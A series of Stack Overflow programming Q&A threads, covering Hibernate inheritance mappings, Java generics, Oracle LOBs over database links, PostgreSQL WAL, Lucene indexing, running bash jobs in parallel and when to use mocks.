Q: Why @OneToMany does not work with inheritance in Hibernate @Entity
@Inheritance(strategy = InheritanceType.SINGLE_TABLE)
public class Problem {
@ManyToOne
private Person person;
}
@Entity
@DiscriminatorValue("UP")
public class UglyProblem extends Problem {}
@Entity
public class Person {
@OneToMany(mappedBy="person")
private List< UglyProblem > problems;
}
I think it is pretty clear what I am trying to do. I expect @ManyToOne person to be inherited by UglyProblem class. But there will be an exception saying something like: "There is no such property found in UglyProblem class (mappedBy="person")".
All I found is this. I was not able to find the post by Emmanuel Bernard explaining reasons behind this.
Unfortunately, according to the Hibernate documentation "Properties from superclasses not mapped as @MappedSuperclass are ignored."
Well I think this means that if I have these two classes:
public class A {
private int foo;
}
@Entity
public class B extends A {
}
then field foo will not be mapped for class B. Which makes sense. But if I have something like this:
@Entity
public class Problem {
@Id
@GeneratedValue(strategy = GenerationType.AUTO)
private Long id;
private String name;
public Long getId() {
return id;
}
public void setId(Long id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
}
@Entity
public class UglyProblem extends Problem {
private int levelOfUgliness;
public int getLevelOfUgliness() {
return levelOfUgliness;
}
public void setLevelOfUgliness(int levelOfUgliness) {
this.levelOfUgliness = levelOfUgliness;
}
}
I expect the class UglyProblem to have the fields id and name, and both classes to be mapped to the same table. (In fact, this is exactly what happens, I have just checked again). I have got this table:
CREATE TABLE "problem" (
"DTYPE" varchar(31) NOT NULL,
"id" bigint(20) NOT NULL auto_increment,
"name" varchar(255) default NULL,
"levelOfUgliness" int(11) default NULL,
PRIMARY KEY ("id")
) AUTO_INCREMENT=2;
Going back to my question:
I expect @ManyToOne person to be inherited by UglyProblem class.
I expect that because all other mapped fields are inherited and I do not see any reason to make this exception for ManyToOne relationships.
Yeah, I saw that. In fact, I used the read-only solution for my case. But my question was "Why..." :). I know that there is an explanation given by a member of the Hibernate team. I was not able to find it and that is why I asked.
I want to find out the motivation of this design decision.
(if you are interested in how I ran into this problem: I inherited a project built using Hibernate 3. It was JBoss 4.0.something + Hibernate was already there (you'd download it all together). I was moving this project to JBoss 4.2.2 and I found out that there are inherited mappings of "@OneToMany mappedBy" and it worked fine on the old setup...)
A: I think it's a wise decision made by the Hibernate team. They could be less arrogant and make it clear why it was implemented this way, but that's just how Emmanuel, Chris and Gavin work. :)
Let's try to understand the problem. I think your concepts are "lying". First you say that many Problems are associated with People. But then you say that one Person has many UglyProblems (and does not relate to other Problems). Something is wrong with that design.
Imagine how it's going to be mapped to the database. You have a single table inheritance, so:
_____________
|__PROBLEMS__| |__PEOPLE__|
|id <PK> | | |
|person <FK> | -------->| |
|problemType | |_________ |
--------------
How is Hibernate going to make the database enforce that a Problem only relates to a Person if its problemType equals UP? That's a very difficult problem to solve. So, if you want this kind of relation, every subclass must be in its own table. That's what @MappedSuperclass does.
PS.: Sorry for the ugly drawing :D
A: Unfortunately, according to the Hibernate documentation "Properties from superclasses not mapped as @MappedSuperclass are ignored." I ran up against this too. My solution was to represent the desired inheritance through interfaces rather than the entity beans themselves.
In your case, you could define the following:
public interface Problem {
public Person getPerson();
}
public interface UglyProblem extends Problem {
}
Then implement these interfaces using an abstract superclass and two entity subclasses:
@MappedSuperclass
public abstract class AbstractProblemImpl implements Problem {
@ManyToOne
private Person person;
public Person getPerson() {
return person;
}
}
@Entity
public class ProblemImpl extends AbstractProblemImpl implements Problem {
}
@Entity
public class UglyProblemImpl extends AbstractProblemImpl implements UglyProblem {
}
As an added benefit, if you code using the interfaces rather than the actual entity beans that implement those interfaces, it makes it easier to change the underlying mappings later on (less risk of breaking compatibility).
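To make that concrete, here is a minimal sketch of client code written against the interface (the ProblemReportService class and its describe method are hypothetical, made up purely for illustration):
public class ProblemReportService {
    // Depends only on the Problem interface, never on ProblemImpl or
    // UglyProblemImpl, so the entity mapping can change underneath it.
    public String describe(Problem problem) {
        Person person = problem.getPerson();
        return (person != null) ? "Problem assigned to " + person : "Unassigned problem";
    }
}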
A: In my case I wanted to use the SINGLE_TABLE inheritance type, so using @MappedSuperclass wasn't an option.
What works, although not very clean, is to add the Hibernate proprietary @Where clause to the @OneToMany association to force the type in queries:
@OneToMany(mappedBy="person")
@Where(clause="DTYPE='UP'")
private List< UglyProblem > problems;
A: I think you need to annotate your Problem super-class with @MappedSuperclass instead of @Entity.
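A rough sketch of that suggestion, assuming you can accept that Problem itself is then no longer an entity (so you can no longer query for plain Problems):
// Problem becomes a mapped superclass: its fields, including the
// @ManyToOne person, are mapped into each concrete entity subclass.
@MappedSuperclass
public abstract class Problem {
    @ManyToOne
    private Person person;
}
@Entity
public class UglyProblem extends Problem {
    // inherits the person mapping, so mappedBy="person" on
    // Person.problems can now resolve against UglyProblem
}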
A: I figured out how to solve the OneToMany mappedBy problem.
In the derived class UglyProblem from the original post, the mapped property (the person reference) needs to be in the derived class, not the parent class.
@Entity
@Inheritance(strategy = InheritanceType.SINGLE_TABLE)
@ForceDiscriminator
public class Problem {
}
@Entity
@DiscriminatorValue("UP")
public class UglyProblem extends Problem {
@ManyToOne
private Person person;
}
@Entity
public class Person {
@OneToMany(mappedBy="person")
private List< UglyProblem > problems;
}
Found the secret sauce, for Hibernate at least: http://docs.jboss.org/hibernate/stable/annotations/api/org/hibernate/annotations/ForceDiscriminator.html The @ForceDiscriminator annotation makes the @OneToMany honor the discriminator.
Requires Hibernate Annotations.
A: In my opinion @JoinColumn should at least provide an option to apply the @DiscriminatorColumn = @DiscriminatorValue to the SQL "where" clause, although I would prefer this behaviour to be a default one.
I am very surprised that in the year 2020 this is still an issue.
Since this object design pattern is not so rare, I think it is a disgrace that JPA still does not cover this simple feature in the specs, forcing us to search for ugly workarounds.
Why must this be so difficult? It is just an additional where clause and yes, I do have a db index prepared for @JoinColumn, @DiscriminatorColumn combo.
.i.. JPA
Introduce your own custom annotations and write code that generates native queries. It will be a good exercise.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38057",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: Generics in Java Is there any shorthand way of defining and using generic definitions without having to keep repeating a particular generic description, such that if there is a change I don't have to change all definitions/usages throughout the codebase? For example, is something like this possible:
Typedef myGenDef = < Object1, Object2 >;
HashMap< myGenDef > hm = new HashMap< myGenDef >();
for (Entry< myGenDef > ent : hm.entrySet())
{
.
.
.
}
A: In a generic method, you can use a limited form of type inference to avoid some repetition.
Example: if you have the function
<K, V> Map<K, V> getSomething() {
//...
}
you can use:
final Map<String, Object> something = getSomething();
instead of:
final Map<String, Object> something = this.<String, Object>getSomething();
A: Use Factory Pattern for creation of Generics:
Method Sample:
public Map<String, Integer> createGenMap(){
return new HashMap<String,Integer>();
}
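A small usage example (my own, not the answerer's) showing that the type arguments then only need to be spelled out at the declaration site:
// The generic arguments live in one place (the factory method);
// call sites just declare the variable type once.
Map<String, Integer> wordCounts = createGenMap();
wordCounts.put("hello", 1);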
A: The pseudo-typedef antipattern mentioned by Shog9 would work - though it's not recommended to use an ANTIPATTERN - but it does not address your intentions. The goal of pseudo-typedef is to reduce clutter in declaration and improve readability.
What you want is to be able to replace a group of generics declarations with a single one. I think you have to stop and think: "in which ways is it valuable?". I mean, I can't think of a scenario where you would need this. Imagine class A:
class A {
private Map<String, Integer> values = new HashMap<String, Integer>();
}
Imagine now that I want to change the 'values' field to a different Map implementation. Why would there be many other fields scattered through the code that need the same change? As for the operations that use 'values', a simple refactoring would be enough.
A: There's the pseudo-typedef antipattern...
class StringList extends ArrayList<String> { }
Good stuff, drink up! ;-)
As the article notes, this technique has some serious issues, primarily that this "typedef" is actually a separate class and thus cannot be used interchangeably with either the type it extends or other similarly defined types.
A: No. Groovy, a JVM language, is dynamically typed, though, and would let you write:
def map = new HashMap<complicated generic expression>();
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38068",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "10"
} |
Q: Best way to handle LOBs in Oracle distributed databases If you create an Oracle dblink you cannot directly access LOB columns in the target tables.
For instance, you create a dblink with:
create database link TEST_LINK
connect to TARGETUSER IDENTIFIED BY password using 'DATABASESID';
After this you can do stuff like:
select column_a, column_b
from data_user.sample_table@TEST_LINK
Except if the column is a LOB, then you get the error:
ORA-22992: cannot use LOB locators selected from remote tables
This is a documented restriction.
The same page suggests you fetch the values into a local table, but that is... kind of messy:
CREATE TABLE tmp_hello
AS SELECT column_a
from data_user.sample_table@TEST_LINK
Any other ideas?
A: Yeah, it is messy, I can't think of a way to avoid it though.
You could hide some of the messiness from the client by putting the temporary table creation in a stored procedure (and using "execute immediate" to create the table)
One thing you will need to watch out for is leftover temporary tables (should something fail half way through a session, before you have had time to clean it up) - you could schedule an Oracle job to run periodically and remove any leftover tables.
A: For query data, the solution of user2015502 is the smartest. If you want to insert or update LOB's AT the remote database (insert into xxx@yyy ...) you can easily use dynamic SQL for that. See my solution here:
A: The best solution is to use a query like the one below, where column_b is a BLOB:
SELECT (select column_b from sample_table@TEST_LINK) AS column_b FROM DUAL
A: You could use materialized views to handle all the "cache" management. It's not perfect but works in most cases :)
A: Do you have a specific scenario in mind?
For example, if the LOB holds files, and you are on a company intranet, perhaps you can write a stored procedure to extract the files to a known directory on the network and access them from there.
A: In this specific case, the only way the two systems can communicate is using the dblink.
Also, the table solution is not that terrible, it's just messy to have to "cache" the data on my side of the dblink.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38074",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: How to implement mouse dragging in Visual Basic? I need to create a quick-n-dirty knob control in Visual Basic 2005 Express, the value of which is incremented/decremented by "grabbing" it with the mouse and moving the cursor up/down. Because the knob itself doesn't move, I need to keep tracking the mouse movement outside of the rectangle of the control.
I use a Label with an ImageList to implement this (I have a list of 127 bitmaps representing the knob in various positions).
Which events should I react to?
A: You need the control to handle three events: Mouse Down, Mouse Move and Mouse Up. On the Mouse Down event, you will need to capture the mouse. This means the mouse messages are sent to the control that has the capture. In the mouse move event, if the input is captured then update the displayed image depending on the amount the mouse moved. In the mouse up event, release the capture if the input is captured.
The boolean jjnguy suggests is unnecessary as the Capture property of a Control is readable so it's possible to determine if the capture has been set.
A: Your problem will be to determine which bitmap you have to display based upon the coordinates the mouse reports in the mouse_move event. You'll need to perform some magic to transform the coordinates and come up with a value that you can use to pick the right image.
It doesn't sound too complicated, just a little bit of trial and error in the math. Skizz has already shown you how to capture the events.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38081",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: How to prevent Write Ahead Logging on just one table in PostgreSQL? I am considering log-shipping of Write Ahead Logs (WAL) in PostgreSQL to create a warm-standby database. However I have one table in the database that receives a huge amount of INSERT/DELETEs each day, but which I don't care about protecting the data in it. To reduce the amount of WALs produced I was wondering, is there a way to prevent any activity on one table from being recorded in the WALs?
A: Unfortunately, I don't believe there is. The WAL logging operates on the page level, which is much lower than the table level and doesn't even know which page holds data from which table. In fact, the WAL files don't even know which pages belong to which database.
You might consider moving your high activity table to a completely different instance of PostgreSQL. This seems drastic, but I can't think of another way off the top of my head to avoid having that activity show up in your WAL files.
A: Ran across this old question, which now has a better answer. Postgres 9.1 introduced "Unlogged Tables", which are tables that don't log their DML changes to WAL. See the docs for more info, but at least now there is a solution for this problem.
See Waiting for 9.1 - UNLOGGED tables by depesz, and the 9.1 docs.
A: To offer one option in answer to my own question: there are temp tables - "temporary tables are automatically dropped at the end of a session, or optionally at the end of the current transaction (see ON COMMIT below)" - which I think don't generate WALs. Even so, this might not be ideal as the table creation & design will have to be in the code.
A: I'd consider memcached for use-cases like this. You can even spread the load over a bunch of cheap machines too.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38090",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Cross Page Postback doesn't work for client-side enabled button I am using a cross page postback for Page A to pass data to Page B.
The button that causes the postback has its postbackurl set but is disabled until the user selects a value from a DDL, at which point the button is enabled using javascript. However this prevents the cross page postback from occurring; Page A just posts back to itself.
If the button is never disabled it works fine. Anyone know how to solve this?
A: It looks like when the button is disabled .Net doesn't bother adding the necessary bits to handle the cross page postback on the client, so they will be missing when the button is enabled client-side.
I guess one solution would be to have the button enabled to start with (so that .Net adds the cross page postback controls) and then disable it using javascript as soon as the control loads on the client. But this sounds a bit clunky.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38107",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Inbox Management (in Outlook) I've gone back and forth between having an organized inbox and having an inbox with absolutely everything I've received in it.
Would you recommend leaving everything in an inbox, or organize it? If you organize it, is there any method to your madness or possibly an Outlook (2003) plug-in to aid in this task?
For what it's worth, I feel way more productive with everything in my inbox, grouped by date. I feel like I spend way more time doing inbox management any other way.
A: I would recommend following the inbox zero approach advocated by 43 folders. Joel Spolsky apparently uses it and a lot of people feel it's a great way of decluttering and organising your email life :-).
A: If you don't want to actually clear out your inbox, you could use a good search utility like Google Desktop, Yahoo Desktop Search (is that what it's called) or my current favorite, Xobni.
With these tools you don't have to worry about where you put the mails you saved. Just save them all and let the tools find it.
A: I switched to gMail and have never been happier.
You could also try using a tags plugin like http://www.taglocity.com/index.html
A: I'm going with the Microsoft way;
*
*Delete it
*Defer it
*Delegate it
*Do it
It works for me great.
You can read about it at http://www.microsoft.com/atwork/manageinfo/email.mspx.
A: We've invested in a few licenses of Simply File for our employees. Works a treat at managing your inbox - it learns (don't ask me how, but it is very good) how to file things for you and does it automatically.
I was sceptical about it at first, until I tried it; then I was a convert.
A: Keep to the ideal of inbox zero in the actual inbox, then employ a decent search engine (Google Desktop or Xobni for example).
I have a handful of project- or filter-specific folders (e.g. for system generated status messages that go to a mailing list), but generally all archived email is dumped in one folder.
In Outlook 2007 categories (which can approach the usefulness of tags) do add a potentially useful dimension.
A: I use message flags for my "action folders" and shunt everything into one big Archive folder after I process it (use the Ctrl+Shift+V shortcut to do this). As an example, I might flag a received message with a red flag (reply), a blue flag (pending, meaning I have to do something about it first), or maybe a green flag (reference). I then have search folders for each of my flag colors.
This flagging/search folder method is explained fairly well in this blog post.
I've also implemented a Gmail-like conversation view search folder which has been pretty handy.
A: The best place to start with getting control of your email is definitely Merlin Mann's excellent Inbox Zero series. In particular his Google Tech Talk video is a great talk.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38117",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "8"
} |
Q: Strategies for keeping a Lucene Index up to date with domain model changes Was looking to get peoples thoughts on keeping a Lucene index up to date as changes are made to the domain model objects of an application.
The application in question is a Java/J2EE based web app that uses Hibernate. The way I currently have things working is that the Hibernate mapped model objects all implement a common "Indexable" interface that can return a set of key/value pairs that are recorded in Lucene. Whenever a CRUD operation is performed involving such an object I send it via JMS queue into a message driven bean that records in Lucene the primary key of the object and the key/value pairs returned from the index( ) method of the Indexable object that was provided.
My main worries about this scheme are if the MDB gets behind and can't keep up with the indexing operations that are coming in, or if some sort of error/exception stops an object from being indexed. The result is an out-of-date index for either a short, or long, period of time.
Basically I was just wondering what kind of strategies others had come up with for this sort of thing. Not necessarily looking for one correct answer but am imagining a list of "whiteboard" sort of ideas to get my brain thinking about alternatives.
A: Change the message: just provide the primary key and the current date, not the key/value pairs. Your mdb fetches the entity by primary key and calls index(). After indexing you set a value "updated" in your index to the message date. You update your index only if the message date is after the "updated" field of the index. This way you can't get behind because you always fetch the current key/value pairs first.
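A rough sketch of that check inside the consuming MDB; the indexUpdatedAt, loadByPrimaryKey and reindex helpers are hypothetical placeholders, not a real API:
public void onMessage(Message message) {
    try {
        MapMessage msg = (MapMessage) message;
        long id = msg.getLong("id");
        Date messageDate = new Date(msg.getLong("date"));
        // Only reindex if this message is newer than what the index already
        // holds for this entity; older (stale) messages are simply skipped.
        Date indexedAt = indexUpdatedAt(id);          // hypothetical helper
        if (indexedAt == null || messageDate.after(indexedAt)) {
            Indexable entity = loadByPrimaryKey(id);  // hypothetical helper
            reindex(id, entity.index(), messageDate); // hypothetical helper
        }
    } catch (JMSException e) {
        throw new RuntimeException(e);
    }
}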
As an alternative: have a look at http://www.compass-project.org.
A: The accepted answer is 8 years old now and very out of date.
The Compass Project has not been maintained for a long time now, as its main developer moved on to create the excellent Elasticsearch.
The modern answer to this is to use Hibernate Search, which incidentally can map to either a Lucene index directly or through Elasticsearch.
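For reference, a minimal sketch of what a Hibernate Search mapping might look like (classic Hibernate Search 5-style annotations; the entity and field names are illustrative, and Hibernate Search 6 uses a different annotation set):
import org.hibernate.search.annotations.Field;
import org.hibernate.search.annotations.Indexed;
import javax.persistence.Entity;
import javax.persistence.GeneratedValue;
import javax.persistence.Id;
// Hibernate Search keeps the Lucene (or Elasticsearch) index in sync with
// these entities automatically as part of the normal Hibernate flush/commit.
@Entity
@Indexed
public class Article {
    @Id
    @GeneratedValue
    private Long id;
    @Field
    private String title;
    @Field
    private String body;
}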
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38125",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: after opening target in new window - new window cannot be closed I've got a page with a control whose link points to a gif file. Right clicking on the link (in IE7) and selecting "open target in new window" correctly displays the image. However I can't then close the new IE window.
MORE INFO: Works OK in Firefox 3
What might I be doing wrong ?
TIA
Tom
A: There isn't really anything you can do wrong that would prevent a window from being closed on the client.
My guess is this is a problem with the system installation.
Test this again using another browser on the same computer, and then on another computer.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38151",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: What is a good maintainability index using Visual Studio 2008 code analysis? My company recently purchased TFS and I have started looking into the code analysis tools to help drive up code quality and noticed a good looking metric "maintainability index". Is anyone using this metric for code reviews/checkins/etc? If so, what is an acceptable index for developers to work toward?
A: The maintainability index is not as much a fixed value you look at, it's more of an indication that code is hard to understand, test and/or debug. I usually try to keep high-level code (basically anything except for the real plumbing code) above 80, where 90+ would be good. It adds a competitive element to programming as maintainable as possible to me.
The code analysis tool really shines in the area of dependencies and the number of branches within a method though. More branches mean harder testing, which makes it more error-prone. Dependencies, same thing.
In other people's code, I use the maintainability index to spot possible bad parts in the code, so I know where to review it. Also, methods/classes with a high number of lines are an indication of poor code to me (unless it can't be avoided, again, the plumbing works).
In the end, I think it mainly depends on how often your code will change. Code that's expected to change a lot has to score higher in maintainability than your typical 'write once' code.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38158",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "16"
} |
Q: Parallelize Bash script with maximum number of processes Lets say I have a loop in Bash:
for foo in `some-command`
do
do-something $foo
done
do-something is cpu bound and I have a nice shiny 4 core processor. I'd like to be able to run up to 4 do-something's at once.
The naive approach seems to be:
for foo in `some-command`
do
do-something $foo &
done
This will run all the do-somethings at once, but there are a couple of downsides, mainly that do-something may also have some significant I/O, and performing it all at once might slow things down a bit. The other problem is that this code block returns immediately, so there is no way to do other work when all the do-somethings are finished.
How would you write this loop so there are always X do-somethings running at once?
A: If you're familiar with the make command, most of the time you can express the list of commands you want to run as a makefile. For example, if you need to run $SOME_COMMAND on files *.input each of which produces *.output, you can use the makefile
INPUT = a.input b.input
OUTPUT = $(INPUT:.input=.output)
%.output : %.input
$(SOME_COMMAND) $< $@
all: $(OUTPUT)
and then just run
make -j<NUMBER>
to run at most NUMBER commands in parallel.
A: Depending on what you want to do xargs also can help (here: converting documents with pdf2ps):
cpus=$( ls -d /sys/devices/system/cpu/cpu[[:digit:]]* | wc -w )
find . -name \*.pdf | xargs --max-args=1 --max-procs=$cpus pdf2ps
From the docs:
--max-procs=max-procs
-P max-procs
Run up to max-procs processes at a time; the default is 1.
If max-procs is 0, xargs will run as many processes as possible at a
time. Use the -n option with -P; otherwise chances are that only one
exec will be done.
A: While doing this right in bash is probably impossible, you can get it semi-right fairly easily. bstark gave a fair approximation of right, but his has the following flaws:
*
*Word splitting: You can't pass any jobs to it that use any of the following characters in their arguments: spaces, tabs, newlines, stars, question marks. If you do, things will break, possibly unexpectedly.
*It relies on the rest of your script not backgrounding anything. If you do, or if you later add something to the script that gets sent to the background because you forgot you weren't allowed to use backgrounded jobs on account of his snippet, things will break.
Another approximation which doesn't have these flaws is the following:
scheduleAll() {
local job i=0 max=4 pids=()
for job; do
(( ++i % max == 0 )) && {
wait "${pids[@]}"
pids=()
}
bash -c "$job" & pids+=("$!")
done
wait "${pids[@]}"
}
Note that this one is easily adaptable to also check the exit code of each job as it ends so you can warn the user if a job fails or set an exit code for scheduleAll according to the amount of jobs that failed, or something.
The problem with this code is just that:
*
*It schedules four (in this case) jobs at a time and then waits for all four to end. Some might be done sooner than others which will cause the next batch of four jobs to wait until the longest of the previous batch is done.
A solution that takes care of this last issue would have to use kill -0 to poll whether any of the processes have disappeared instead of the wait and schedule the next job. However, that introduces a small new problem: you have a race condition between a job ending, and the kill -0 checking whether it's ended. If the job ended and another process on your system starts up at the same time, taking a random PID which happens to be that of the job that just finished, the kill -0 won't notice your job having finished and things will break again.
A perfect solution isn't possible in bash.
A: Maybe try a parallelizing utility instead rewriting the loop? I'm a big fan of xjobs. I use xjobs all the time to mass copy files across our network, usually when setting up a new database server.
http://www.maier-komor.de/xjobs.html
A: With GNU Parallel http://www.gnu.org/software/parallel/ you can write:
some-command | parallel do-something
GNU Parallel also supports running jobs on remote computers. This will run one per CPU core on the remote computers - even if they have different number of cores:
some-command | parallel -S server1,server2 do-something
A more advanced example: Here we have a list of files that we want my_script to run on. The files have an extension (maybe .jpeg). We want the output of my_script to be put next to the files in basename.out (e.g. foo.jpeg -> foo.out). We want to run my_script once for each core the computer has, and we want to run it on the local computer, too. For the remote computers we want the file to be processed to be transferred to the given computer. When my_script finishes, we want foo.out transferred back, and we then want foo.jpeg and foo.out removed from the remote computer:
cat list_of_files | \
parallel --trc {.}.out -S server1,server2,: \
"my_script {} > {.}.out"
GNU Parallel makes sure the output from each job does not mix, so you can use the output as input for another program:
some-command | parallel do-something | postprocess
See the videos for more examples: https://www.youtube.com/playlist?list=PL284C9FF2488BC6D1
A: function for bash:
parallel ()
{
awk "BEGIN{print \"all: ALL_TARGETS\\n\"}{print \"TARGET_\"NR\":\\n\\t@-\"\$0\"\\n\"}END{printf \"ALL_TARGETS:\";for(i=1;i<=NR;i++){printf \" TARGET_%d\",i};print\"\\n\"}" | make $@ -f - all
}
using:
cat my_commands | parallel -j 4
A: Really late to the party here, but here's another solution.
A lot of solutions don't handle spaces/special characters in the commands, don't keep N jobs running at all times, eat cpu in busy loops, or rely on external dependencies (e.g. GNU parallel).
With inspiration for dead/zombie process handling, here's a pure bash solution:
function run_parallel_jobs {
local concurrent_max=$1
local callback=$2
local cmds=("${@:3}")
local jobs=( )
while [[ "${#cmds[@]}" -gt 0 ]] || [[ "${#jobs[@]}" -gt 0 ]]; do
while [[ "${#jobs[@]}" -lt $concurrent_max ]] && [[ "${#cmds[@]}" -gt 0 ]]; do
local cmd="${cmds[0]}"
cmds=("${cmds[@]:1}")
bash -c "$cmd" &
jobs+=($!)
done
local job="${jobs[0]}"
jobs=("${jobs[@]:1}")
local state="$(ps -p $job -o state= 2>/dev/null)"
if [[ "$state" == "D" ]] || [[ "$state" == "Z" ]]; then
$callback $job
else
wait $job
$callback $job $?
fi
done
}
And sample usage:
function job_done {
if [[ $# -lt 2 ]]; then
echo "PID $1 died unexpectedly"
else
echo "PID $1 exited $2"
fi
}
cmds=( \
"echo 1; sleep 1; exit 1" \
"echo 2; sleep 2; exit 2" \
"echo 3; sleep 3; exit 3" \
"echo 4; sleep 4; exit 4" \
"echo 5; sleep 5; exit 5" \
)
# cpus="$(getconf _NPROCESSORS_ONLN)"
cpus=3
run_parallel_jobs $cpus "job_done" "${cmds[@]}"
The output:
1
2
3
PID 56712 exited 1
4
PID 56713 exited 2
5
PID 56714 exited 3
PID 56720 exited 4
PID 56724 exited 5
For per-process output handling $$ could be used to log to a file, for example:
function job_done {
cat "$1.log"
}
cmds=( \
"echo 1 \$\$ >\$\$.log" \
"echo 2 \$\$ >\$\$.log" \
)
run_parallel_jobs 2 "job_done" "${cmds[@]}"
Output:
1 56871
2 56872
A:
maxjobs=4
parallelize () {
while [ $# -gt 0 ] ; do
jobcnt=(`jobs -p`)
if [ ${#jobcnt[@]} -lt $maxjobs ] ; then
do-something $1 &
shift
else
sleep 1
fi
done
wait
}
parallelize arg1 arg2 "5 args to third job" arg4 ...
A: The project I work on uses the wait command to control parallel shell (ksh actually) processes. To address your concerns about IO, on a modern OS, it's possible parallel execution will actually increase efficiency. If all processes are reading the same blocks on disk, only the first process will have to hit the physical hardware. The other processes will often be able to retrieve the block from OS's disk cache in memory. Obviously, reading from memory is several orders of magnitude quicker than reading from disk. Also, the benefit requires no coding changes.
A: Here an alternative solution that can be inserted into .bashrc and used for everyday one liner:
function pwait() {
while [ $(jobs -p | wc -l) -ge $1 ]; do
sleep 1
done
}
To use it, all one has to do is put & after the jobs and a pwait call, the parameter gives the number of parallel processes:
for i in *; do
do_something $i &
pwait 10
done
It would be nicer to use wait instead of busy waiting on the output of jobs -p, but there doesn't seem to be an obvious solution to wait till any of the given jobs is finished instead of all of them.
A: Instead of a plain bash, use a Makefile, then specify number of simultaneous jobs with make -jX where X is the number of jobs to run at once.
Or you can use wait ("man wait"): launch several child processes, call wait - it will exit when the child processes finish.
maxjobs = 10
foreach line in `cat file.txt` {
jobsrunning = 0
while jobsrunning < maxjobs {
do job &
jobsrunning += 1
}
wait
}
job ( ){
...
}
If you need to store the job's result, then assign their result to a variable. After wait you just check what the variable contains.
A: This might be good enough for most purposes, but is not optimal.
#!/bin/bash
n=0
maxjobs=10
for i in *.m4a ; do
# ( DO SOMETHING ) &
# limit jobs
if (( $(($((++n)) % $maxjobs)) == 0 )) ; then
wait # wait until all have finished (not optimal, but most times good enough)
echo $n wait
fi
done
A: Here is how I managed to solve this issue in a bash script:
#! /bin/bash
MAX_JOBS=32
FILE_LIST=($(cat ${1}))
echo Length ${#FILE_LIST[@]}
for ((INDEX=0; INDEX < ${#FILE_LIST[@]}; INDEX=$((${INDEX}+${MAX_JOBS})) ));
do
JOBS_RUNNING=0
while ((JOBS_RUNNING < MAX_JOBS))
do
I=$((${INDEX}+${JOBS_RUNNING}))
FILE=${FILE_LIST[${I}]}
if [ "$FILE" != "" ];then
echo $JOBS_RUNNING $FILE
./M22Checker ${FILE} &
else
echo $JOBS_RUNNING NULL &
fi
JOBS_RUNNING=$((JOBS_RUNNING+1))
done
wait
done
A: You can use a simple nested for loop (substitute appropriate integers for N and M below):
for i in {1..N}; do
(for j in {1..M}; do do_something; done & );
done
This will execute do_something N*M times in M rounds, each round executing N jobs in parallel. You can make N equal the number of CPUs you have.
A: My solution to always keep a given number of processes running, keep track of errors, and handle uninterruptible / zombie processes:
function log {
echo "$1"
}
# Take a list of commands to run, runs them sequentially with numberOfProcesses commands simultaneously runs
# Returns the number of non zero exit codes from commands
function ParallelExec {
local numberOfProcesses="${1}" # Number of simultaneous commands to run
local commandsArg="${2}" # Semi-colon separated list of commands
local pid
local runningPids=0
local counter=0
local commandsArray
local pidsArray
local newPidsArray
local retval
local retvalAll=0
local pidState
local commandsArrayPid
IFS=';' read -r -a commandsArray <<< "$commandsArg"
log "Runnning ${#commandsArray[@]} commands in $numberOfProcesses simultaneous processes."
while [ $counter -lt "${#commandsArray[@]}" ] || [ ${#pidsArray[@]} -gt 0 ]; do
while [ $counter -lt "${#commandsArray[@]}" ] && [ ${#pidsArray[@]} -lt $numberOfProcesses ]; do
log "Running command [${commandsArray[$counter]}]."
eval "${commandsArray[$counter]}" &
pid=$!
pidsArray+=($pid)
commandsArrayPid[$pid]="${commandsArray[$counter]}"
counter=$((counter+1))
done
newPidsArray=()
for pid in "${pidsArray[@]}"; do
# Handle uninterruptible sleep state or zombies by omitting them from the running process array (how to kill what is already dead? :)
if kill -0 $pid > /dev/null 2>&1; then
pidState=$(ps -p$pid -o state= 2> /dev/null)
if [ "$pidState" != "D" ] && [ "$pidState" != "Z" ]; then
newPidsArray+=($pid)
fi
else
# pid is dead, get it's exit code from wait command
wait $pid
retval=$?
if [ $retval -ne 0 ]; then
log "Command [${commandsArrayPid[$pid]}] failed with exit code [$retval]."
retvalAll=$((retvalAll+1))
fi
fi
done
pidsArray=("${newPidsArray[@]}")
# Add a trivial sleep time so bash won't eat all CPU
sleep .05
done
return $retvalAll
}
Usage:
cmds="du -csh /var;du -csh /tmp;sleep 3;du -csh /root;sleep 10; du -csh /home"
# Execute 2 processes at a time
ParallelExec 2 "$cmds"
# Execute 4 processes at a time
ParallelExec 4 "$cmds"
A: DOMAINS="list of some domain in commands"
for foo in `some-command`
do
eval `some-command for $DOMAINS` &
job[$i]=$!
i=$(( i + 1))
done
Ndomains=$(echo $DOMAINS | wc -w)
for i in $(seq 1 1 $Ndomains)
do
echo "wait for ${job[$i]}"
wait "${job[$i]}"
done
This approach will work for the parallelization. The important thing is that the eval line ends with '&',
which will put the commands into the background.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38160",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "98"
} |
Q: When should I mock? I have a basic understanding of mock and fake objects, but I'm not sure I have a feeling about when/where to use mocking - especially as it would apply to this scenario here.
A: Rule of thumb:
If the function you are testing needs a complicated object as a parameter, and it would be a pain to simply instantiate this object (if, for example it tries to establish a TCP connection), use a mock.
A: You should mock an object when you have a dependency in a unit of code you are trying to test that needs to be "just so".
